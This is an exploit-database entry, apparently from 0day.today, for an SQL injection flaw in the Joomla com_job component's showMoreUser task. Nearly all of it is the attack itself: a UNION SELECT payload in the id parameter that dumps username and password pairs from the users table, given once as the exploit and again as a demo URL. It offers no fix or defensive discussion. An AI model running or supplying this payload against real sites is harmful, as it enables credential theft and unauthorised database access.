Joomla Component com_job ( showMoreUse) SQL injection vulnerability

2009-12-08T00:00:00
ID 1337DAY-ID-10120
Type zdt
Reporter Palyo34
Modified 2009-12-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Joomla Component com_job ( showMoreUse) SQL injection vulnerability
===================================================================

===========================================================================
   
  
   
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL]
   
[ Exploit ]
   
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
 
[ Demo ]
 
http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
   
   
===========================================================================



#  0day.today [2018-01-02]  #